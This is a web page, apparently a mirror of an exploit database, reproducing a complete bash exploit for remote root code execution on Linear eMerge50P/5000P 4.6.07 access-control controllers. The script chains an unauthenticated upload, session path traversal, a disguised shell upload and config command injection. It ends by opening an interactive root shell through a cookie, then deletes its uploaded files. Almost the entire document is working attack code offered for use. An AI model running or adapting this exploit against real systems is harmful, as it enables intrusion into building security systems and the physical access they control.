扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 |
# Exploit Title: eMerge50P 5000P 4.6.07 - Remote Code Execution # Google Dork: NA # Date: 2018-11-11 # Exploit Author: LiquidWorm # Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/ # Software Link: http://linear-solutions.com/nsc_family/e3-series/ # Version: 4.6.07 # Tested on: NA # CVE : CVE-2019-7269 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # Advisory: https://applied-risk.com/resources/ar-2019-005 # PoC: #!/bin/bash # # Full remote code execution exploit for the Linear eMerge50P/5000P 4.6.07 # Including escalating to root privileges # CVE: CVE-2019-7266, CVE-2019-7267, CVE-2019-7268, CVE-2019-7269 # Advisory: https://applied-risk.com/resources/ar-2019-006 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # # This script is tested on macOS 10.13.6 # by Sipke Mellema # # usage: ./sploit.sh http://target # ########################################################################## # # $ ./sploit.sh http://192.168.1.1 # # # . . . . . # .. ... # ||Linear eMerge50 4.6.07|| # |||| # ||Remote code executionz|| # || With priv escalation || # ||Get yours today || # ||| || # ||Boomch|| # .. ... # ..... # # # # [*] Checking connection to the target.. # [V] We can connect to the server # [*] Checking if already infected.. # [V] Target not yet infected.. # [*] Creating custom session file.. # [*] Uploading custom session file.. # [V] Session file active! # [*] Retrieving CSRF token.. # [V] CSRF_TOKEN: AI1R5ebMTZXL8Vu6RyhcTuavuaEbZvy9 # [*] Uploading file.. # [V] File successfully uploaded # [*] Writing new config.. # [V] Wrote new config, restarting device # [*] Looks good! Waiting for device to reboot.. # [V] Executing: whoami.. # [V] Username found: root # [*] Cleaning up uploaded files.. # [*] Removing fake backup file.. # [*] Removing shell script.. # [*] Files removed # # [*] If that worked, you can how execute commands via your cookie # [*] The URL is: http://192.168.1.1/cgi-bin/websrunnings.cgi # [*] Or type commands below ('quit' to quit) # # root@http://192.168.1.1$ id # uid=0(root) gid=0(root) groups=0(root) # root@http://192.168.1.1$ quit # ########################################################################## RED='\033[0;31m'; BLUE='\033[0;34m'; GREEN='\033[0;32m'; NC='\033[0m' BANNER=" \t . . . . . \t .. ... \t||${BLUE}Linear eMerge50 4.6.07${RED}|| \t||${BLUE}${RED}|| \t||${BLUE}Remote code executionz${RED}|| \t||${BLUE} With priv escalation ${RED}|| \t||${BLUE}Get yours today ${RED}|| \t||${BLUE}| ${RED}|| \t||${BLUE}Boomch${RED}|| \t .. ... \t..... ${NC} " printf "\n${RED}${BANNER}\n\n" function echo_green { printf "${GREEN}[*] $@${NC}\n" } function echo_blue{ printf "${BLUE}[V] $@${NC}\n" } function echo_red { printf "${RED}[-] $@${NC}\n" } function show_usage { echo -en "Usage: ./sploit.sh " } # check arguments if [ $# -eq 0 ] then echo_red "Incorrect parameters" show_usage exit fi # Define global paramters VULN_HOST=$1 TEST_CMD="whoami" # ========================= Vuln 2: Session ID allows path traversal # Path traversal to session file injected as backup file SESSION_ID="../web/upload/system/backup.upg" function run_remote_shell { # shell is in the context of the lower privileged user called s2user # but the user has sudo rights # ========================= Vuln 5: Webserver runs as root TEST_CMD='' while read -p "${SPLOT_USERNAME}@${VULN_HOST}$ " TEST_CMD && [ "${TEST_CMD}" != "quit" ] ; do curl -s -k -H "Cookie: sudo $TEST_CMD" ${VULN_HOST}/cgi-bin/websrunnings.cgi echo "" done } # ========================= Pre-exploit checks # check connection echo_green "Checking connection to the target.." RESULT=<code>curl -sL -w "%{http_code}\\n" ${VULN_HOST} -o /dev/null --connect-timeout 3 --max-time 5 if [ "$RESULT" != "200" ] ; then echo_red "Could not connect to ${VULN_HOST} :(" ; exit fi echo_blue "We can connect to the server" # check already infected echo_green "Checking if already infected.." RESULT=<code>curl -sL -w "%{http_code}\\n" ${VULN_HOST}/cgi-bin/websrunnings.cgi -o /dev/null --connect-timeout 3 --max-time 5 if [ "$RESULT" == "200" ] ; then echo_blue "Target already seems to be infected" SPLOT_USERNAME=<code>curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi echo_blue "Username found: ${SPLOT_USERNAME}" read -p "Try shell directly? (Y/N)" TEST if [ "$TEST" == "Y" ] ; then echo_green "Trying direct shell.." run_remote_shell exit fi else echo_blue "Target not yet infected.." ; fi # ========================= Vuln 1: Sys update CGI script allows unauthenticated upg-file upload # Used to create file with the contents of a valid session file # Session file required a timestamp from < 3600 seconds ago # And a valid (remote) IP address echo_green "Creating custom session file.." # binary session file SESS_FILE_BIN_PRE="MzEzMzc4MDA4NQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTeXN0ZW0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEFkbWluaXN0cmF0b3IAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYWRtaW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" SESS_FILE_BIN_POST="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAQAAAAEAAAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQUkxUjVlYk1UWlhMOFZ1NlJ5aGNUdWF2dWFFYlp2eTkAAAAAYtPxW0o/71s=" # write session/backup file printf $SESS_FILE_BIN_PRE | base64 -D > backup.upg # write IP MY_IP=<code>curl -s https://api.ipify.org printf ${MY_IP} >> backup.upg printf $SESS_FILE_BIN_POST | base64 -D >> backup.upg # replace timestamp python -c "import struct,time,sys; sys.stdout.write(struct.pack('<i',int(time.time()+(3600*5))))" | dd of=backup.upg bs=1 seek=1080 count=4 conv=notrunc 2> /dev/null # upload session as backup file echo_green "Uploading custom session file.." curl -s -F upload=@backup.upg ${VULN_HOST}/cgi-bin/uplsysupdate.cgi # check if session file works RESULT=<code>curl -s -w "%{http_code}\\n" --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/foo -o /dev/null --connect-timeout 3 --max-time 5 if [ "$RESULT" != "200" ] ; then echo_red "Creating session file didn't seem to work :(" ; exit fi echo_blue "Session file active!" # ========================= Vuln 3: Image upload allows any file contents # We use it to upload a shell script # It will be run as root on startup # get csrf token echo_green "Retrieving CSRF token.." CSRF_TOKEN=<code>curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/frameset/ | grep -E -o 'csrft = "(.*)"' | awk -F '"' '{print $2}' echo_blue "CSRF_TOKEN: $CSRF_TOKEN" if [ -z "$CSRF_TOKEN" ]; then echo_red "Could not get CSRF token :(" exit fi # prepare file # this will run as root echo "cp /usr/local/s2/web/cgi-bin/websrunning.cgi /usr/local/s2/web/cgi-bin/websrunnings.cgi" > shell.jpg echo 'sed -i '"'"'s/echo "OK"/A=<code>\$HTTP_COOKIE</code>;printf "\$A"/'"'"' /usr/local/s2/web/cgi-bin/websrunnings.cgi' >> shell.jpg # upload file echo_green "Uploading file.." RESULT=<code>curl -s --cookie ".sessionId=$SESSION_ID" \ -F "csrft=$CSRF_TOKEN" \ -F "person=31337" \ -F "file=@shell.jpg" \ ${VULN_HOST}/person/upload/ | grep -o "File successfully uploaded" echo_blue $RESULT if [[ ! "$RESULT" =~ "successfully" ]]; then echo_red "Could not upload file :(" exit fi # ========================= Vuln 4: Config allows command injection # Length is limited # Also, no spaces allowed # change config # the file in the config file will be run as root at startup echo_green "Writing new config.." curl -s ${VULN_HOST}/goform/saveS2ConfVals --cookie ".sessionId=$SESSION_ID" --data "timeserver1=a.a%24%28bash%3C%2Fusr%2Flocal%2Fs2%2Fweb%2Fupload%2Fpics%2Fshell.jpg%29×erver2=×erver3=&timezone=America%2FChicago&save=Save&urlOk=cfgntp.asp&urlError=cfgntp.asp&okpage=cfgntp.asp" > /dev/null echo_blue "Wrote new config, restarting device" # restart device RESULT=<code>curl -s --cookie ".sessionId=$SESSION_ID" ${VULN_HOST}/goform/restarts2Conf --data "changeNetwork=1" | grep -o "The proxy server could not handle the request" # this is supposed to get returned (device rebooting) if [[ "$RESULT" =~ "could not handle the request" ]]; then echo_green "Looks good! Waiting for device to reboot.." sleep 20 echo_blue "Executing: whoami.." SPLOT_USERNAME=<code>curl -s -k -H "Cookie: sudo whoami" ${VULN_HOST}/cgi-bin/websrunnings.cgi echo_blue "Username found: ${SPLOT_USERNAME}" # cleanup echo_green "Cleaning up uploaded files.." echo_green "Removing fake backup file.." RESULT=<code>curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/system/backup.upg" ${VULN_HOST}/cgi-bin/websrunnings.cgi echo_green "Removing shell script.." RESULT=<code>curl -s -k -H "Cookie: sudo rm /usr/local/s2/web/upload/pics/shell.jpg" ${VULN_HOST}/cgi-bin/websrunnings.cgi echo_green "Files removed" # start shell echo "" echo_green "If that worked, you can now execute commands via your cookie" echo_green "The URL is: ${VULN_HOST}/cgi-bin/websrunnings.cgi" echo_green "Or type commands below ('quit' to quit)" echo "" run_remote_shell else echo_red "Exploit failed :(" fi exit |
体验盒子
